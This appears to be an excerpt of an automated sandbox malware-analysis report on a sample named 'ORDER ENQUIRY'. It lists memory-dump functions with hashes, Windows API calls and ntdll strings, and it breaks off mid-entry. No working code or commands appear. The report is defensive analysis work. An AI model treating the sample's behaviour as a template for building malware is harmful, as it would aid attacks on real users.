Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4

Function 01AF2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2BFA

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: da4093725da007f47b0569a1f7968c934daaf0d3c61ff0b3e3ce01047b4b39e8
Instruction ID: a787c8704dc1b662fff80193c6c8a817af6f8f963a911a7f5f2e4f3ff8b5c5a1
Opcode Fuzzy Hash: da4093725da007f47b0569a1f7968c934daaf0d3c61ff0b3e3ce01047b4b39e8
Instruction Fuzzy Hash: 9090023260180842D1857158440464A040597D1341F95C055A0025699DCB158B9977A1

Function 01AF2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2B6A

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0b2088d070ae7e6ba56f437aab096d46d2282297eaedcc1dc6655e75a02b7f4
Instruction ID: 5c96aef408457ed280fd3883dcbc858769536541f53640441b60911387e76d72
Opcode Fuzzy Hash: e0b2088d070ae7e6ba56f437aab096d46d2282297eaedcc1dc6655e75a02b7f4
Instruction Fuzzy Hash: 0890026260280043410A71584414616440A97E0241B55C061E10145D5DC6258AD16225

Function 01AF2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2ADA

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2cf001f3bf81c96ccf95a41d9d6a8b0b4f6d8823517c08ba0d2a6f39fdd24825
Instruction ID: a3c272fc3d6753fe34b9cc7c6855d88a1e06743edefd4e4e3b63caa25826aef2
Opcode Fuzzy Hash: 2cf001f3bf81c96ccf95a41d9d6a8b0b4f6d8823517c08ba0d2a6f39fdd24825
Instruction Fuzzy Hash: 9790022661180043010AB5580704507044697D5391355C061F1015595CD7218AA15221

Function 01AF2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2DFA

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4ff844f74eb8889034fac977234c54372e0a7f8f8c16d5f7045a14561317ec9
Instruction ID: 4625fd114ce2645afef411ebfb12b3f7908b2250e060b89d6289273c21162be5
Opcode Fuzzy Hash: e4ff844f74eb8889034fac977234c54372e0a7f8f8c16d5f7045a14561317ec9
Instruction Fuzzy Hash: 5E90023260180453D11671584504707040997D0281F95C452A042459DDD7568B92A221

Function 01AF2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2DDA

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bdeafcfaff5bd443f8cd98f5972ae45d3ad3602931c77fb7cba3fc346bce335
Instruction ID: e5d1d78cb13ca353faa0c69b5a9c1c7250b73d7208235d7124401e21932a6232
Opcode Fuzzy Hash: 4bdeafcfaff5bd443f8cd98f5972ae45d3ad3602931c77fb7cba3fc346bce335
Instruction Fuzzy Hash: 9D90022264284192554AB15844045074406A7E0281795C052A1414995CC6269A96D721

Function 01AF2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2D3A

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5cf671421cf7985266ba78a0a25ad85213c5620e0ad04b460ae26b652b15bb91
Instruction ID: aa3f59700df4ea21a01dafbe71f5485e58c6fab93c16e0c4866a49b8f115c78e
Opcode Fuzzy Hash: 5cf671421cf7985266ba78a0a25ad85213c5620e0ad04b460ae26b652b15bb91
Instruction Fuzzy Hash: ED90022270180043D145715854186064405E7E1341F55D051E0414599CDA158A965322

Function 01AF2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2D1A

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a8d68a826b632640ce244288d28c60dcbb5078a5f2813083568e56899e98a0c
Instruction ID: 48fa016c9bf58239440e6d3bd13181afdc0d132546e264381c36be62bb87256a
Opcode Fuzzy Hash: 7a8d68a826b632640ce244288d28c60dcbb5078a5f2813083568e56899e98a0c
Instruction Fuzzy Hash: 9990022A61380042D1857158540860A040597D1242F95D455A001559DCCA158AA95321

Function 01AF2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2CAA

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 159f5254c83419512b5514a1806c67b4c11f14a36bfe8d693edac6c92facc208
Instruction ID: d83596a00b7945e667c191641d7a3ad0f3ebe2c5bb572e97272288d31da4b23f
Opcode Fuzzy Hash: 159f5254c83419512b5514a1806c67b4c11f14a36bfe8d693edac6c92facc208
Instruction Fuzzy Hash: 5590023260180442D10575985408646040597E0341F55D051A502459AEC7658AD16231

Function 01AF2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2C7A

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d37cc8d9fca5d477c40688d7715fed5259d32aea2e4469be626d2ce555fa3794
Instruction ID: e6f1855a17781af26dec0b15052c4fa04d9ddb72a5f43a98e355ae6150167d38
Opcode Fuzzy Hash: d37cc8d9fca5d477c40688d7715fed5259d32aea2e4469be626d2ce555fa3794
Instruction Fuzzy Hash: D790023260188842D1157158840474A040597D0341F59C451A442469DDC7958AD17221

Function 01AF2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2FBA

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 163c28eaed26d21f741ee6b2064e37363cd6a670ae6254c2151c5b420156ae44
Instruction ID: 1336aab368ed1ba5b40453f04e8f27da38a4843bdc25962be64c934d0a189a7c
Opcode Fuzzy Hash: 163c28eaed26d21f741ee6b2064e37363cd6a670ae6254c2151c5b420156ae44
Instruction Fuzzy Hash: 6E900222A01800824145716888449064405BBE1251755C161A0998595DC6598AA55765

Function 01AF2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2F9A

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a65e50270daa2bb95435b3c58ee2dd5f4ef9af8c6dea53c00085e213f38ca63b
Instruction ID: e3d722858902d8bb0b2818b5d445f1c80ac136f3e5b8bed2622549d44c60200e
Opcode Fuzzy Hash: a65e50270daa2bb95435b3c58ee2dd5f4ef9af8c6dea53c00085e213f38ca63b
Instruction Fuzzy Hash: F9900232601C0442D1057158481470B040597D0342F55C051A116459ADC7258A916671

Function 01AF2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2FEA

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ac0af7c958f8f0bdba1e2704fb4a5c01c964cfc1d59640d9d8470c9e53dcb91
Instruction ID: 833ddf8ed4b81c7a396ddd0d2e2a803ca5e8e2b66eb9027f8d7c1340a86cc52f
Opcode Fuzzy Hash: 1ac0af7c958f8f0bdba1e2704fb4a5c01c964cfc1d59640d9d8470c9e53dcb91
Instruction Fuzzy Hash: 57900222611C0082D20575684C14B07040597D0343F55C155A0154599CCA158AA15621

Function 01AF2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2F3A

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b9cb88b942b682415916452ed00147050de33a9a4a7b6ebc32d11a252a15629
Instruction ID: 14060e5e22a0f02ff0ed41e3075afa9906c756b2e3af70eeabba2b96cda46948
Opcode Fuzzy Hash: 8b9cb88b942b682415916452ed00147050de33a9a4a7b6ebc32d11a252a15629
Instruction Fuzzy Hash: E190026274180482D10571584414B060405D7E1341F55C055E1064599DC719CE926226

Function 01AF2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2EAA

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fcff8806188d88e013620f011c8621efccd10cbafd6440531641b1ebe061c072
Instruction ID: f98de20f1c0d4d2f4f9fcb468e5053ba30529a6935d88780b0236d6d76bee596
Opcode Fuzzy Hash: fcff8806188d88e013620f011c8621efccd10cbafd6440531641b1ebe061c072
Instruction Fuzzy Hash: 1E90027260180442D14571584404746040597D0341F55C051A5064599EC7598FD56765

Function 01AF2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2E8A

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2bc9327e1e374a4245cadade8c0f0d1b42b9be55cb28bee0617ffdb3a3a24926
Instruction ID: 1caedc964de7fb8b4424711dd73c0e91aaaa538642a18c914ead6c804e2b9d9f
Opcode Fuzzy Hash: 2bc9327e1e374a4245cadade8c0f0d1b42b9be55cb28bee0617ffdb3a3a24926
Instruction Fuzzy Hash: 51900222A0180542D10671584404616040A97D0281F95C062A102459AECB258BD2A231

Function 00409AA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D

Strings

&EA, xrefs: 0041A642, 0041A64C

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4

Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 56
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0cca15f02b617a7521befa122fa94ec674600ef9b2b0daaf6e6ce91175bef69b
Instruction ID: 470611dd28a873b78db0426f77af5a4d602ff93c2f93c66593f9dc5625664ae8
Opcode Fuzzy Hash: 0cca15f02b617a7521befa122fa94ec674600ef9b2b0daaf6e6ce91175bef69b
Instruction Fuzzy Hash: 6701D871A8031877E720A6958C43FFF7B1C5B40B55F04415EFF04BA1C2D6E9690547EA

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA

Function 0041A652 Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 64c43df1c5145697a011099cf4d5effccd4cd55dfc51a19ab4ae289822762346
Instruction ID: ab58f9fd6dd11ada3974d1572abae490446c9ea29d49f77d7c8d67bc790f3ce2
Opcode Fuzzy Hash: 64c43df1c5145697a011099cf4d5effccd4cd55dfc51a19ab4ae289822762346
Instruction Fuzzy Hash: 8FE0DFF92492449FC711EF65AC818AB7790AF81309318464EE89D47343D632D92686E6

Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4

Function 0041A695 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e64ffb56dd947b0bb967b0ba6fb0e7f1011988acc4ba440c63e82543c5f24ce3
Instruction ID: df653f655f34d755fa6f4cbab6b9e4262b4fc2d95fa75ca97e3f66e86f9797c3
Opcode Fuzzy Hash: e64ffb56dd947b0bb967b0ba6fb0e7f1011988acc4ba440c63e82543c5f24ce3
Instruction Fuzzy Hash: B5E02C312002047FCB20EF68CC86FCB3BA88F19394F008268F81CAB282C131A600CAE1

Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5

Function 0041A7BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 9a27bee001199bf1dabcb3458cc3aca9529968407b8229d8826ee980f40a67cc
Instruction ID: 7fdf8e8b7e5be2e70791ab513ae4a640a17de0c82418153196c178a81fd18c5d
Opcode Fuzzy Hash: 9a27bee001199bf1dabcb3458cc3aca9529968407b8229d8826ee980f40a67cc
Instruction Fuzzy Hash: EAE09AB1200204ABCB10EF44CC85EE737A9EF88224F008094FE4C57242C630E8158BF5

Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5

Function 01AF2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AF2C24

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4293b01e6a8cf9ddca5b47cec5957ec832de4092bc543dbd5c5989e81f0dd20f
Instruction ID: 50d04c62b374d11386772dcbafa7f41cb499096691ee4a25885e43abf00dbcb7
Opcode Fuzzy Hash: 4293b01e6a8cf9ddca5b47cec5957ec832de4092bc543dbd5c5989e81f0dd20f
Instruction Fuzzy Hash: E3B09B72D019C5C5DA16E7A446087177D00B7D0741F15C076E3030686F8738C5D1E275

Non-executed Functions

Function 01B32349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01B33187
LdrpInitializeExecutionOptions, xrefs: 01B3317D
UnloadEventTraceDepth, xrefs: 01B324C0
MinimumStackCommitInBytes, xrefs: 01B32BB0
FrontEndHeapDebugOptions, xrefs: 01B32489
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01B33176
UseImpersonatedDeviceMap, xrefs: 01B3251C
ShutdownFlags, xrefs: 01B324A1
GlobalFlag, xrefs: 01B32F3F, 01B33059
@, xrefs: 01B32B74
DisableHeapLookaside, xrefs: 01B3246D
DisableExceptionChainValidation, xrefs: 01B3275F
ExecuteOptions, xrefs: 01B325A0
MaxDeadActivationContexts, xrefs: 01B32D82
@, xrefs: 01B32942
TracingFlags, xrefs: 01B32549
RaiseExceptionOnPossibleDeadlock, xrefs: 01B32579
CFGOptions, xrefs: 01B32967
MaxLoaderThreads, xrefs: 01B324EC
GlobalFlag2, xrefs: 01B32FC0

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 3831a6bfc5c4c1c82aad8308684bb770ba3b6fa275eb46452ba804d30a3f38bb
Instruction ID: 0e5cecdd8e18366f84e3e6fcdcd8d9599f797bbb638b21996633f4f8360501a5
Opcode Fuzzy Hash: 3831a6bfc5c4c1c82aad8308684bb770ba3b6fa275eb46452ba804d30a3f38bb
Instruction Fuzzy Hash: EF928D71608742AFE729DE29C880B6BB7E8FF84750F0449ADFA94D7250D770E854CB92

Function 01AE8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B254CE
Critical section address, xrefs: 01B25425, 01B254BC, 01B25534
Address of the debug info found in the active list., xrefs: 01B254AE, 01B254FA
undeleted critical section in freed memory, xrefs: 01B2542B
Invalid debug info address of this critical section, xrefs: 01B254B6
corrupted critical section, xrefs: 01B254C2
Critical section debug info address, xrefs: 01B2541F, 01B2552E
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B254E2
double initialized or corrupted critical section, xrefs: 01B25508
Thread identifier, xrefs: 01B2553A
Critical section address., xrefs: 01B25502
8, xrefs: 01B252E3
Thread is in a state in which it cannot own a critical section, xrefs: 01B25543
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B2540A, 01B25496, 01B25519

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 987cef01669a52191d287115a770f3233426c8590437544d3b0df089f19d24a6
Instruction ID: 0457984c24a7c56d01f75ba2d983e1259b2e966d66469f8043b67aaa25fdcfaf
Opcode Fuzzy Hash: 987cef01669a52191d287115a770f3233426c8590437544d3b0df089f19d24a6
Instruction Fuzzy Hash: F58178B0A00358AFDF24CF99C945BAEBBF5FB49714F104159E508BB281D379A985CBA0

Function 01AE29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

